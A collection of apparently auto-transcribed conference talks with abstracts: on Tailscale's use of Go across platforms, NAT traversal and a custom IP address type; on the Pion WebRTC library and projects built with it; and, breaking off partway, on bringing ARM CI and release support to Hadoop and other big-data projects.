Linux it uses NetLink to subscribe to network change events, things like if you change the Wi-Fi or you're plugged into Ethernet, in or out or things like that. 
And then on FreeBSD there's DevD to get equivalent change notifications. TUN is an interface that's available on most operating systems that you let you inject IP packets in and out of the kernel. So you can do in-userspace, you can implement a network device. So tail scale is all in userspace currently. Because you have to do a system call for every packet that goes in or out of the kernel, DevNet TUN has just been getting slower and slower after all the specter mitigations and whatnot. So we'll probably be looking into other interfaces on some operating systems, at least on Linux. But for now we're just using TUN, which is good enough. On Windows we have a little GUI. This is the not open source part. But otherwise all the open source bits work on Windows. So if you want to use the tail scale D daemon or the tail scale CLI, we actually include both of these in our Windows download. So the only part of the Windows download that's not open source is the little system tray icon. For that we use the Alex and Walk package. That is GitHub, Alex and Walk, it stands for Windows application level toolkit I think or something like that. But it lets you make system tray icons in Windows. So we use a very small subset of it. We make the system tray icon and we add some menu items and we disable them and check them and we have sub menus. But anyway you just specify some callbacks for things and you set them checked and unchecked. So it's a pretty go-ish API on top of the Win32 stuff, which is very much not go-ish. For Mac OS there are two options. You could either use the open source stuff again, either just running the daemon and the client or we also have a GUI that's in the Apple App Store. And the GUI part looks like that. It's basically similar to the Windows claim. There's a menu bar application that tells you whether you're connected or not. It lets you log in, log out, change accounts or whatever. It's written in Swift, unfortunately. It'd be nice to be pure go but we have to be a little pragmatic. So that part is written in Swift but we call in to go from Swift. So we have very, very again limited code written in there. The trick from go is you use build mode C archive. And so Xcode then or your Xcode Swift project thinks that it's calling it to a C function. So you write like a little food.h file that declares some extern symbols. For instance, we link in the whole CLI into the main application so we don't have to ship a second application because in the App Store you're not allowed to exec another process. So we can't ship a second binary and have you exec that. So we link the CLI into the application. So if you run the tailscaled.app binary itself with arguments, it just acts like the open source CLI. So to invoke that, we pass in the directory that is the application directory on disk. And in Swift at the very beginning, basically an equivalent of funk main in this application did finish launching. We basically call go BCLI and in the go part you just import C and you export some symbol. This is like a magic C go comment here that puts that symbol in the whatever the symbol table of the C archive part. And then whatever then this code takes over and runs. So in the future, I just saw that there's this Mac driver program that gives you all like these macOS APIs and integration purely from go and they have like gooey stuff working and stuff. So this could be a future interesting direction to at least try out to write macOS applications purely in go without the Swift part. But we'll see. 
On iOS, we basically use like 98% of the same code or more of as macOS. It's basically identical. This one is not open source because iOS is an open source. So I don't know. And it's also really freaking impossible to because we use these network extensions on iOS, you have to have like special entitlements Apple calls it. So you can't even even if we made the iOS client open source, you couldn't just you couldn't just compile it and run the damn thing because you have to be using an Apple account that's in an organization that has permission to use the network extension API or something. So it would almost be too painful to open source. It's just supporting people trying to answer questions about how you build the thing. But so far we're just sticking with our philosophy that we're open source on platforms that are open source. But the Android client though is open source. You can get it at Tesco. So Tesco Android, it's also in the FDROID store and it's in the Google Play store. It's written using a Geo, which is written primarily by Elias Naur. And so he wrote our Tesco Android client. And so it uses Geo for all like the GUI stuff and a limited amount of Java. There's not a bunch. There's I didn't count the lines, but it's mostly JNI's indigo using basically the same trick. A JNI package that exports some various JNI things. And there's some JNI wrappers around all the typical C to Java bridge API. And then the app itself is pretty small. There's like a GUI backend thread that runs or GoRoutine that runs. And there's the backend part that handles packets that runs. This is kind of what it looks like to call JNI stuff. You declare, you put the native keyword on certain functions in Java and then it calls into, then you export the thing using again the same Sego trick. And then you're in the JNI world. So it's ugly, but it limits how much Java we had to write. All the packet processing again is the exact same code base in Go. On all the random NASs and hardware, the Synology and QNAPs, no BN sense. Basically all of those, we just take the open source code and we use Go, Goose, FreeBSD or Goose Linux and Gorge, whatever. We're not doing most of these builds right now. We probably will start, but there's some community projects to do like Synology and QNAP that are just little wrappers around the open source code doing things like this. On the server side, we're all Go. We have a coordination server that deals with notifying other devices in your network when something changed. So someone's endpoints change or like they, I don't know, the administrator change the ACL policy or something. Some configuration about your network changed and we have to tell the other devices. So we have all the clients are like stuck in a long pole. So a long hanging HTTP request. And that part is all Go. Our database is also Go. We just migrated to LCD maybe six months ago or so. And Tailscale's web administration panel, I would love to tell you it's Go, but it's TypeScript, which I guess is fine. The tooling is not very fine. I'm kind of horrified by the JavaScript tooling coming from Go, but I don't know. I'm biased. But my friend Evan, the wise old Evan, he loves TypeScript and he actually works on the TypeScript team at Google nowadays. So I don't know. I'm willing to keep an open mind and try it out, but I haven't got into it too much. In the future, it'd be nice to maybe move to ES build at least, which is written in Go. 
It's kind of a TypeScript or it's like JavaScript and TypeScript and everything that world front end tooling replacements. I don't really understand any of this stuff, but the numbers on it look good. All right. So the second thing I want to talk about was how we added NAT traversal to WireGuard. WireGuard by itself doesn't deal with any firewalls or NAT traversal things. It kind of assumes that the internet is wide opening, connectable, which is a nice dream and we want to help make that dream possible. So we have a blog post about all the tricks you can do to get through NAT so you can have two peers that can actually connect to each other. This is applicable for all software that needs to connect peer to peer, whether that's Web RTC or whatnot. But we have a bunch of pretty pictures that kind of explains the theory behind it. First I want to show the WireGuard Go code base that we use. Tailscale is just written on top of WireGuard and we use their Go implementation. And their Go implementation has a number of interfaces. One of them is CondutBind. I omitted some of the methods, but the interesting ones here are there's methods to receive a packet over either IPv4 or IPv6. This is an encrypted packet and you've returned the number of bytes you read and the endpoint, which is basically a map. It's another interface, but you basically map from the address you got it from or like however you know what user or what peer this is associated with. Then there's another method to send a plain text packet to that endpoint and then WireGuard does this encryption and sends it out to the endpoint, whatever the addresses of that endpoint are. And then there's going to be close. So we have this package called MagicSoc, which implements this interface. So we have a whole bunch of stuff, but notably like those things you just saw receiving IPv4 or IPv6 or send. And so what this package is trying to do is always finding the best path to these endpoints. So we want to work in all environments, including environments where like UDP is blocked, whether that's some crappy hotel or airport that blocks UDP or some corporate environment or whatever. So in that case, we'll fall back to we offer a TCP relay and we have a whole bunch of like globally distributed servers, much like Cheapo VMs, like five bucks a month, but we just have a ton of them. And your client picks the nearest one. And that's this setDirtMap. Then tail scale first connects, we give it a data structure that has all of our all of our like kind of edge nodes. And these DIRP services are is basically an encrypted packet relay where you in the IP header instead of the address you want to talk to what IP port you want to talk to you, instead of the IP header is like effectively the public key you want to send the encrypted packet to. And so we don't know what we're sending, right? It's a big encrypted wire guard blob. But we route these around for you. So if you don't have direct connectivity yet, then we'll route your your wire guard packets. But then what the magic sock packet does is once it does all these NAT traversal tricks and figures out in punches holes and like the NAT state machines and the connection tracking tables, then the clients transition within like a second to direct connections and they stop using the DIRP relays. Last thing I want to talk about was the net IP type. So this is the standard library type to represent an IP address. The representation is a slice of bytes. 
The problem with this is it's mutable because it's a slice of bytes. And that's part of the contract that if you have one of these or you give it to somebody, you don't know that they're not going to mess with it. So you know, you have to do defensive copies that's always kind of what ends up happening when you have mutable public things. It's also transparent. It's not opaque type. The underlying type is a byte slice and that's part of it's the go one contract. So it's not like we can fix that and go as opposed to things like time that time, which was just an opaque struct. So when a go one dot nine needed monotonic time support, we just changed the representation of time and it just worked out and nobody like knew that we changed the representation of times. But because the net IP type is a, you know, the underlying type is a bite slice, you can't do anything with it. It's also not comparable. It's not comparable because it's a bite, it's a slice and in go, you can't use a slice as a map key and it doesn't support equal to equal. It's also like really big, you know, an IPv6 address is only 16 bytes and IPv4 address is only four bytes. But to store one of these in go, you need a 24 byte slice header and that doesn't actually store any of the address bytes. You still need then, you know, the slice has to point to an underlying array that's either four 16 bytes and go by default parse IP always return 16 bytes. So you end up with 40 bytes to store a four byte IPv4 address. So it's a little wasteful. And there's actually two IP address types in the standard library. There's a, there's the one that can store IPv6 zones and the ones that can't. So some of the APIs return one, some return the other, some take one, some take the other. So it's kind of weird that there are two. Also the, in the standard library, it's, you know, arguably a feature but also a bug that it kind of, it does the IPv6 mapped IPv4 address mapping for you automatically. So if you got some, if you got two strings from the network, one user told you, you know, I am 1.2.3.4 and the other ones that my IPv6 is colon colon fff fff fff fff fff fff you can't tell them apart because they have the exact same representation and memory. You know, again, it's kind of a feature but it's, it's kind of a bummer that that information gets lost. So we made our own IP address type. I'd kind of been stewing on this for a while. It's inet.af.adder.ip. The af of course stands for address family. To kind of jump to the end of the story, the end, the representation ended up looking like this. We've changed it like four or five times but I think, I think this is the final answer. We'll see. So we have, we made a Uint 128 type which just has two Uint 64s, high and low and that's in that adder is where we store the v6 address or the, or the four bytes of the IPv4 address. And then we have this thing that will explain more in a bit that encodes both the IPv6 zone and the address family in one depending on what pointer value you put in there. So the advantage of this representation is it's immutable. So you can pass these around like a time dot time and you know, nobody can mess with them. So we can change the representation for a sixth time if we find a better way to represent IP addresses. It's only 24 bytes. So it's much, it's the same size as a slice header in Go. So it's the same size as a net.ip, just the header part itself and we don't have to store the data. So it's one, it's a value type. There's no allocations. 
I guess I should have listed that too. That as opposed to the standard library that allocates, this type doesn't allocate at all. We also can store the difference between v4 and v6 and it does v6 zone. So we don't need two different types, one like IP and one like IP adder. So to do that magic, you know, a fam or zone field there, we made this other package called intern which is an unsafe package and it's kind of gross but we've tested it and audited it and tested, you know, talked with other people a bit. So we think it's correct now. The API is very simple but very aud. We have this value type. This is the whole API on the screen. I just kind of had to shove it in here to fit. There's this opaque value type that use the pointer of it because we need finalizers. We need the pointer of this value and we have some stuff in there. But the idea is you want to get a globally unique for global unique when the scope of your process, a globally unique pointer to a value that is one to one with some comparable value. So the contract we say here is if you get V and get V2, the returned value is equal if and only if the return pointer will be the same for get one of V2 if and only if the two arguments you passed in are equal. So if you call get a foo at one point of your program and later you saw say get a foo, the returned value will be the exact same pointer. So the naive implementation of this and then you can get back that original thing you passed in. You can get a comp value passed in, you can get it back out by saying get. So the naive implementation of this is you would just put it in a map keyed by an empty interface and it would just grow infinitely. But we don't want to leak memory infinitely, especially if you're like parsing IP addresses from the network that have a zone or whatever and it just grows and grows and grows. So we want to do some cleanup. So the trick is we have a package level mutex that guards a map. And the map is keyed by effectively an empty interface and it points to the Uint pointer of the value. So we're hiding the pointer from the garbage collector to let the garbage collector collect those values anyway. And so this one basically doesn't contribute to the effectively the reference count of the thing. So then internally when we get these we have to use this go no check pointer, this compiler directive because go would otherwise tell us that we're doing it wrong and this code is not safe. And so we have to declare yes, yes, we know that we're violating all the rules and this is terrible. And so the implementation we have a safe implementation too just for checking ourselves. But in practice what it ends up doing is doing a lookup on the map and if it we find it in the map then we take it from the Uint pointer to an unsafe pointer and then get to the value and then we mark the resurrected flag which we have on our value and then we return it. So I'll explain resurrected in a second. But basically that says it was potentially dead. This thing could have been the last known reference and it could have just like it could have been in the process of dying and being collected by the garbage collector and we just brought it back to life through this Uint pointer. Otherwise we make a new value. So this makes a new value pointer with resurrected false and whatever and then we set the finalizer on it and we put it in the map but we don't put the value pointer itself in the map we put the Uint pointer of it in the map. 
So the finalizer which we had registered with runtime set finalizer we grabbed the mutex again the exact same mutex that was used to get the thing and if the value that we're finalizing was resurrected that means we lost the race. Somebody else brought this back to life right as the garbage collector was trying to kill it. So we turn resurrected false on and we reinstall the finalizer that the runtime had just removed for us before it called our finalizer. You can only have one finalizer on an object and when the go runtime calls your finalizer it's saying that that thing is really dead but you have one last chance to bring it back to life. And so this is us bringing it back to life. If it wasn't resurrected then we just delete it from the map and then our map actually shrinks back down to zero. So then what we do is we have this intern value so this pointer is guaranteed to be global unique within the process. So we also want to encode the address family in there. So we have some sentinel values and we want the zero value to be bogus so we make z0 basically means that's the zero value for an IP it's uninitialized. Z4 is a sentinel value that means it's an IPv4 address. Z6 no zone is a sentinel that means it's a v6 address but it doesn't have a scope or a zone. And then our accessors to add a zone to an IP we have this method with zone and if it's not a v6 address to begin with it doesn't make sense to have zones we just return the IPn change to whether it's the zero value or v4. If we're trying to clear the zone we just set it to that sentinel that we had before that z6 and a zone and if it's some non-empty string we call our package the intern get by string and this returns a global unique within the process pointer that we assign to get z and it's that pointer has a reference to the zone that we passed in. So then we want to get the zone back out again if it's a zero value so if z is nil we just return I guess this should say z0 instead of nil but whatever it returns empty string otherwise we call get on the thing and this could return it could return a nil interface but that's why we do this comma okay and we say we want a string out of it if it's a string if it's not a string I don't care give me the zero value of a string and then we return the zone. So anyway that was fun so we're using this IP address type more and more for all of our stuff and kind of pushing it down to all our dependencies and it kind of makes life a lot easier and it has a whole bunch of stuff it does um IP sets and ranges and sitter math and lets us cut up sitters in various different ways and find all the ranges within them or take a range and find all the overlapping sitters to fill that space and so lets us do a whole lot of network math. If you have any questions let me know and if you haven't tried Tailscale try it out it's pretty fun and pretty empowering and I think it's nice. Thanks.
|
I worked on the Go team at Google for about 10 years working on bits of everything, but primarily the standard library (net/http, etc) & its build system. In that time I wrote lots of Go, but almost primarily for Go itself. Joining a startup, I now finally get to use Go all day to build a real product (Tailscale) and it's super exciting. We use Go on the server and in 5 clients: Linux, Windows, macOS, iOS, Android.
|
10.5446/53657 (DOI)
|
Hi, my name is Sean and today we're going to talk about Pion WebRTC. First off, before we actually talk about it, I want to thank everyone who's involved with the project. Pion is a completely non-commercial open source project and we'll talk more about what it's doing. But first off, I want to thank, and these are all the names of the people that have contributed. It's a community project and without these people it wouldn't be possible. I'm super excited to see that we've now crossed over 300 contributors and we've actually had 11 people in the community get jobs. So I'm really excited at how fast the community is growing and if you're interested in being involved in open source, Pion is a great place to be. So first off, before we even get into what you can build with Pion and what it's all about, first let's talk about what is WebRTC? WebRTC was originally designed as a protocol between browsers and servers and it gives you end-to-end secure connection between peers. So that means that I can exchange audio and video and data and no one can see what I'm talking about. You can send multiple audio and video tracks, you can send your desktop and your webcam at the same time along with audio and you can also do binary data. So that's super important if you're doing tele-operation or you want to exchange chat messages or just metadata. And it can be lost, it can be unordered or it can act exactly like a web socket. It gives you that flexibility. And the great thing about WebRTC is it's available in a lot of places. So we have a Python implementation, we have a TypeScript, we have Go, Rust 1 is coming up and then we have Google's implementation in C++. So we have a lot of implementations and what's exciting is I think that WebRTC is slowly becoming maybe the best protocol to have inner process communication between different languages. And it's not just, it doesn't require some PubSub server, it doesn't require them to be running in the same network and we'll talk more about what that means later but this is exciting. And then also outside of Python I'm working on a book called WebRTC for the Curious and it's on how WebRTC really works, not just the APIs we're going to talk about today. And it's a deep dive on the protocols to understand what's going on behind the scenes and the history of WebRTC and then also the great stuff like WebRTC in practice so you can understand debugging and teach you the sharp edges before you hit them yourself. So at a high level, like what does WebRTC solve? WebRTC lets you connect to users that have no public IP. And what that means in practice is you can have two computers that are in completely different networks. On the left let's imagine that's you and your home network, on the right is someone you want to talk to. Your private IPs don't route to each other. You can't say I want to talk from 192.168 to a 10.5. You're in different subnets, it's never going to work. But you do know each other's public IPs. So how can you talk to each other? How does this work? WebRTC uses an attribute of networks called naturalversal. And naturalversal allows you to establish a temporary hole in your network by hitting a stun server or an outside host. And what that does is a NAT will actually give you a temporary hole that people can communicate with you back in just by sending an outbound packet. So here we have a host inside this subnet that sends a single packet out to the stun server and it responds. Now anyone can talk to you. 
Think about it almost like automatic port forwarding. Instead of having to go into your router and configure that this port resolves to this host, you're a WebRTC agent can create these temporary holes and talk to anyone via them. The other thing that WebRTC gives you is mobility. So if you've ever used try to do streaming over TCP, either just data or video, you know that when you roam, you have problems with connectivity. You have to end the TCP connection. You have to start it up again. You have to deal with congestion control and all these other things. The nice thing is WebRTC has that built right in with ICE restarts. So if I'm talking to someone on my phone and I'm having an audio call over my Wi-Fi, I can walk outside, do an ICE restart and the connection starts up all over again. Even though my IP has changed, we don't have to renegotiate. We don't have to re-exchange certificates. We don't have to do any of that. Like it's built right into WebRTC and the congestion control kicks in and everything just works. And speaking of congestion control, you've never heard this term before. A lot of people will think that you can just run a single bandwidth analyzer. So let's say you want to stream to YouTube or Twitch. You think, okay, I'll sit down and measure my network and that's all configure OBS to stream. But in practice, that's not how real world networks work. What if you're streaming and then three more devices join a network and you have congestion? So before you had 50 megabits per second available, now you only have 50 divided by 3 because you have these additional devices. How does that work? WebRTC has built-in congestion control that sends back reports and says, I got these many packets. I lost these many packets. This is my round trip time. And the sender can actually adjust their bitrate live and give you the best experience possible. It's all about tuning. Like what kind of video do I want to send? What bitrate do I have available? And how do I tune that experience to give my viewers the best possible? WebRTC also has a solution for head of line blocking. So if you're not familiar with this problem, the issue is what if you send some data that actually isn't that important, but then you're blocking stuff that is important that's happening now? So let's say you have a system that's sending telemetry data. It's not that important, but you're actually sending valuable data. You don't want to block on the telemetry. So what WebRTC has is data channels, which uses a protocol called SCTP. And in that protocol, you can actually mark certain packets as like, if this isn't delivered, I don't care. And so instead of in a network that has a lot of packet loss, or maybe you don't have, you have a bottleneck on bandwidth, instead of blocking, you mark a single packet with max retransmits of zero, and you don't have that problem anymore. New data flows on block and guarantee and delivery is guaranteed through retransmissions. So on stream two and three, you're guaranteed that packets will arrive on stream one, you don't care. It's nice to get that data through, but if it doesn't arrive, it's not that big of a problem. So now you kind of know what WebRTC is. Let's look at how do we actually build a WebRTC application and go. WebRTC uses the offer answer paradigm. So what that means is that you have two WebRTC agents, let's say you and a friend. What happens is one of you makes an offer. That offer contains things like, these are the codecs I support. 
These are how many tracks I wish to send you. This is my IP address that I discovered via Natroversel. You make an offer, the other side responds with an answer. So now that you have the offer answer, you have an established connection. You can create a data channel. A data channel is just one stream of data, and then the second function is an options argument that lets you specify, like, do I want lossy? Do I care about packet loss and other things like that? And you create that data channel, and then you set an on open handler, and the data channel opens, you send some text. And what's great about this is this works between so many platforms. So I can set up a data channel connection between a browser. I can set it up between a go process. I can set it up between a mobile application. You have WebRTC that's supported on Android, iOS. We have a Rust implementation coming up. This is what's super exciting to me, is these data channels I think are the best way to exchange data that exists right now. And then on the other side is just receiving data channel messages. You set a handler for on data channel, and then you set a handler for on message. We also provide a more go-like interface that feels like an IO reader writer, but this is the idiomatic WebRTC implementation. And another cool thing is if you write your implementation in Go, we actually provide Wazm bindings as well. So you can build just as you expect any Wazm application, and it spits out and it works right in the browser. Finding video is easy as well. You create a new track, you add frames to that track, and you send them. On the other side, you set an on track handler, and you read from them, and that's it. So what kind of things could you build with Pyon, or what are the things people are building today? These are some of the open source projects that excite me the most in the space, and there's a lot more out there than just this. So if you get a chance, check out Awesome Pyon. It's a list of all the things that people are building. This is really a cool one, where a user has a Nintendo Switch that they're sending the video frames out, and then they're sending it to their VR headset. So this is a testament to the fact that you have WebRTC support and an Oculus headset, that you can send video frames over the network, and it's low latency enough that I can sit with a Nintendo Switch in my hand and play the game, but it still feels responsive enough that it's still worth playing a game. So right here, we're not playing something fast enough like a first person shooter, but it does show how immersive and an experience you can build. It's a cross-platform protocol, and you have this kind of flexibility. This is a Go project called Kerberos, and what it's doing is it's making existing security cameras available over the internet in a secure way. So RTSP by default doesn't have security, so you probably shouldn't be streaming it over the internet. But thanks to WebRTC, you can run a WebRTC agent in the network with a security camera and then watch it over the internet. You don't have to put these cameras on the public internet because you have natural versatility. You don't have to worry about security because WebRTC is secure by default, and it's actually mandatory. So this is a great project, and it's super easy to deploy, and it's another example of what kind of power WebRTC can bring to the Go ecosystem. 
Cloud Retro lets you play old NES games right over the internet, and how it works is it's running an NES emulator on a remote AWS instance and it's shipping the video frames back to you, and then you're controlling the emulator via the data channels that we talked about earlier. And because you're running this emulator in a shared location, you can play games with a friend. So you can play multiplayer games, you can save your game state, you can do lots of interesting things thanks to running in a central location. And speaking of running stuff in a central location, this is a really exciting project that I think took off during the whole work from home and pandemic is the ability to run a web browser and not have to run that web browser in an AWS instance and share it with other people. So you access this web browser and multiple people can control it at once. I can watch a YouTube video and multiple people can click around the interface. We have chat on the right, and you can do things like browse documentation together. You could work on a project, you could shop together. It's this browser, it's this co-browsing experience that works for everyone. Completely open source and you can go check it out at that URL. Telego kind of taps into the robotic space. So it hasn't been published yet, but there's a couple really interesting companies that are using PyOn to do tele-operation with WebRTC. So you're sending robots the commands over the data channel and then you're receiving video frames back via WebRTC. And it has all these cool things like congestion control. So as the robot moves in and out, it can increase or decrease the bit rate depending on what's available. It's ubiquitous. So now I can control the robot via my phone. I can control it via a browser or I can have a native client. And then WebRTC also lets me take conferencing right into my terminal. So WebRTC isn't just a browser protocol. It isn't just like an Android or iOS. Here I am chatting with someone in their browser, but I'm in a terminal. It's a WebRTC is a standardized protocol that works in lots of places. The creator of Cloud Game then created a subsequent project called Cloud Morph, where now you can run wine applications and stream them over the internet. So you can run Diablo 2, you can run CAD on a remote GPU instance in AWS. It opens up a lot of these possibilities and it's all simple and scriptable. And the great thing about Go is how easy it is to deploy these things. There's no building C++. There's no dealing with pulling in a bunch of libraries via the package manager of choice. It all just works. It's a pleasure to use this and the latency is great. It's a fantastic project. I think WebRTC also has a chance to really revolutionize how people do things in the ops space. So a lot of smaller companies still have a jump box where you SSH into one host that's on the public internet and then you'll have SSH in the host behind that. You don't have to do that anymore with WebRTC. Because of that natural, so that laptop can access the server and it just works. You don't have to put the server on the public internet. It just they connect right away. I think that's super powerful. It's great for security. It reduces the amount of ops burden of putting those servers, you know, managing mappings and names and stuff like that. Open source. I think you can build some really cool stuff with this. You don't have to worry about running VPNs. And then you also can access right from your browser. 
There's no reason that it has to be to go processes. You could SSH in or simulate SSH over WebRTC. Snowflake was one of the original Pion projects that kind of like brought more attention to Pion and it runs, uses the data channel to do censorship circumvention. So if you have a user that over data channels, they can request, Hey, can you please send me this website that's blocked by my ISP or by my government? It'll download it for you and send it back over WebRTC. And the great thing here is you don't have to download a download a binary. That binary is probably blocked by the already. So you can't download it, but you can't block WebRTC since it's used by so many important things like Hangouts and Zoom and other things like that. Web wormhole lets you exchange files over the internet. So you can, you have a go client and you have a browser client or you can do go to go. So you don't have to send a file via email and then have it be decrypted and have your worry about your mail host accessing and other things like that. Like it's peer to peer and the only person that can decrypt it is on the two ends. And then I think Pion's also bringing a lot of interesting things to the VR space. So here we have a VR experience where the user is moving through the virtual space and their head is actually imposed on their avatars and moving through the space. And you have these interesting things like spatial audio and recreating all these experiences that we can't have now because of the work from home and COVID. Project LikeSpeed is a brand new project that lets you stream OBS to a public server in sub-second time. So instead of having a set up an RTMP server and worrying about HLS, it just does OBS via WebRTC and then anyone can view it. It's super powerful because you don't have to worry about transcoding. It's really easy to deploy. Thanks to Go and a really bright future head for this project. So there's a lot more projects. GitHub.com and go to our awesome Pion repo. We want to share your projects. So if you're building something cool, we'd love to promote it for you. I think there's a lot of great career opportunities that also come from this. I've had developers that built this interesting project. They got hired out of it. They put it on the resume. So if you're looking to get involved with something, we'd love to have you. So come get involved. Join our Slack channel and gain deep WebRTC knowledge. And it's also a fun challenge where you pick the goals. You're on your own timelines. If you want to build something, you get to own it and build it all the way through, which is a really welcome challenge for a lot of developers. So here are all the places you can find us under GitHub.com. Grab an issue, reach out to me directly on Slack, and I'd love to help you get started. It's completely non-commercial. It's a great place to get involved. So we'd love to have you and hope you've learned something interesting in this talk. Thanks.
|
In 2020 we saw a huge spike in interest for RTC. Developers worked quickly to build new tools with the challenge of a socially distanced world. Go has really started to make strides in the RTC world with Pion. Easy deploy, great performance, memory safety and ability to prototype helped it take on C/C++. This talk shows you some basics on WebRTC, then how to use Pion and what you can build with it What does WebRTC give us? What technical real world limitations does WebRTC need to overcome to give us that? WebRTC broken down to 4 parts - Signaling - Connectivity - Encryption - Media/Data - Pion Connecting Using DataChannels Using Media
|
10.5446/53659 (DOI)
|
Hi, welcome to this video. My name is Chen Yu Zheng. I'm from Fawai. In the past two years, our team have been promoting AMP data centers in various areas and the corresponding open source communities. In the next 20 minutes, I will share the works we have done in the big data area, which we think could make users life much easier. The content will be divided into three parts. In the first part, I will introduce the background of our work, including our original intention and why we want to do it. In the second part, I will introduce what we have done in the big data open source communities and what are the benefits. And in the final part, I will share some test data from our demo and give the audience some basic ideas about using AMP data center with big data projects. Okay, let's start. The diversified computing and ARM. In the past few decades, we have experienced technology booming and innovations that are so fast beyond anyone's imagination. 30 years ago, personal computers and the Internet are so expensive that only governments organization can afford. Before we can notice, we have already walked through the mobile Internet era and entered the brand new intelligent era with all things connected. In this era, everyone is talking about cloud, AI, IoT and big data. In order to make this new scenario functional, the computing power demands have grown rapidly in the past few decades too. There are also various innovations on computing architecture that can help break bottlenecks in the traditional architecture and boost the performance in certain areas. There is a thing that we have entered the post-mortem law era. We believe that in this era, make the most use of diversified computing is the key to fulfill the increasing computer power demands. When people talking about make use of diversified computing, they can mean different things. A more traditional idea is to combine different types of computing sources. A lot of projects have already done this. They have enabled GPU, FPGA or ASIC in their workflow to provide better performance in certain areas. The most popular case could be GPU provides better performance in AI tasks. But today, I want to focus on the general purpose CPU only. Actually, in the CPU world, there are also different types of architectures that have their own unique properties, such as the well-known X86, ARM, PowerPC and the open source RISC 5. With the most use of those, can also bring users a lot of benefits. Among all those CPU architectures, X86 is for sure the most popular one, especially in the open source world. And today, I want to talk about how we can add ARM to the cluster. Want to know why? Let's walk through some facts first. According to Wikipedia, ARM architecture has been introduced in 1985. According to the official website, the shipment of ARM chips reached 100 billion in 2017. And that's 32 years after the architecture was born. But from 2017 to the start of 2020, the shipment has become 160 billion. And that's only the beginning of 2020. If we take the shipment of 2020 into account, we can say that in the last three years, there are as many ARM chips sold as it used to sold for 30 years. And yes, the majority of the shipments are mobile devices and IoT devices. But things have changed in 2020. If you check the top 10 most popular words for IT industry in 2020, I believe ARM should be one of them. There are tons of news about IT giants looking to ARM data centers and PCs. Some of them are still rumors, but most of them are already on the market. 
There are already a lot of ARM chips for data centers and PCs from different companies on the market. And there are also ARM virtual machines provided by the top cloud providers. With all these facts and technology trends behind it, we believe that promoting ARM data center to the open source community is a valuable thing to do under the current circumstances. So, how are we doing this? The first thing we do is to enable ARM in the upstream development workflow. Let me show you the details. In a typical open source development workflow, the contributor wants to contribute some codes to a project. He or she has to write the codes, build and test the codes on his or her local development environment. After everything is checked, he or she can push the code to the project repository, for example, on GitHub. And the code will also be built and tested there, and if everything works okay, the codes might be merged to the mainstream. After a certain period of time, the project might build and release a package for users to use directly. All those tests in the workflow guarantee the quality of the project. Since X86 is the major product on the market, and the continuous, highly-quality contribution from X86 users and vendors, for the majority of open source communities, the development workflow mentioned above is built on X86 platform. So, for X86 users, the quality is good for sure. But for ARM users, or users in other platforms, there might be problems. As the workflow does not provide build and test on those platforms. In order to provide a quality assurance on ARM platform, the first thing we should do is to propose to add ARM resources to the development workflow, and run the same test to achieve the same quality for ARM users. And that's exactly what we did. Speaking of providing ARM resources to the open source communities, there are actually several choices. You should check which one is the most suitable for the community you're aimed. For example, projects like Hadoop uses CI system from the Apache Foundation. It is a Jenkins system. So we have to donate resources to the system and add the corresponding jobs. Spark on the other hand is a little bit different. It also uses Jenkins, but it is a separate system maintained by the AMP lab. So we donated ARM servers to the systems too. The server we donated usually comes from public clouds, like Huawei cloud and AWS cloud. They can both provide powerful ARM servers. Many other projects now use this travel CI. Luckily, travel CI supports ARM now. So for those projects, we just have to add a new job identical to the existing x86 jobs. There are also some platforms that can provide free ARM resources, such as the Open Lab. It is based on the Zoo project from the Open Infrastructure community, which can provide ARM and x86 CI resources. And Linaro also have a platform called Linaro Developer Cloud, which users can apply for ARM resources for development purpose. In the last two years, our team have gotten in touch with the most popular big data communities. We have proposed and donated ARM resources to set up AMP CI in those communities. In 2019, we have fixed a lot of issues and successfully enabled two major projects, Hadoop and Spark. And with the demonstration effects of these two popular projects, we have enabled more projects in last year. And we will keep the work in 2021. I will put the links of those CI's in the end of this video. You can have a look in case you are interested. 
Our next step to make users' life easier is to provide a pre-built package for their own platform. After about nine months of stable running of the ARM CI, the Hadoop community have released their first release that officially claimed ARM support and provided a pre-built banner list in the download page. Since we are talking about Hadoop, I would also like to share some details about what we did in the community to make it work on AMP. It might be useful for those who might be interested in supporting other projects. Hadoop is a Java project, so it should work on any platform. Well, this is largely correct, but there are still problems. It is because Hadoop is also an very old project. Some of the projects Hadoop dependents on lacks ARM support. The major one is the protocol buffers. Most Apache Big Data projects are still using protocol buffer 2.5.0. And it lacks ARM support. The ARM support was added in version 3.5, so we propose to upgrade the dependency. Upgrade protocol is a quite big task, as it has been used in many places. It takes us about six months to discuss and work with the community. And finally, we have upgraded to 3.7.1. The rest are similar. We made the JRPC level DB and Netty be able to work on ARM. And we propose to use the newer version with ARM support. After all this, we have provided a Dockerfile and script to help the release manager to release the pre-built binary for ARM platform. Except for the dependency problems that could block Big Data running on ARM platform, there are also some very interesting findings that could affect the actual usage. After we have added the CI's to the Big Data project, we started to observe some strange cases. In some test cases with mathematical calculations, we saw that the test results are different in X86 and ARM. For example, when calculate log 3, the 16 digits after decimal points are different in those platforms. After some investigation, we found that the Java provides two libraries to calculate mathematical calculations, the math library and the strict math library. Most projects use the math library. In the math library, when calculate, it first calls for default implementation. It will check whether there is an architecture-specific optimized implementation available. Those implementations could provide better performance, but sometimes the mathematical precision is not guaranteed. And that's actually our case. On X86, there are optimizations to use assembly, and the 16 digits after decimal is not correct in mass. In JDK8, ARM does not provide optimization. In JDK11, ARM have an optimization with mathematical precision guaranteed. So, if you want to calculate the value in a mixed deployment, or you care more about precision rather than the slightly performance improvement in those calculations, you should consider using the strict math library instead. So now we know that it works on ARM. But how good could it run? What kind of benefits could it bring to our users? Here I have some results of the comparison using the previously mentioned Hadoop release, which could probably provide some ideas. Before we get into the details, let's have a look at one of the ARM's well-known benefits over X86, the price. Here I selected some major cloud providers in different areas that can provide ARM virtual machines and bare metal servers. We can see that in both AWS cloud and AhoiWe cloud, compatible ARM VMs can save about 20 to 24% of annual expenses. 
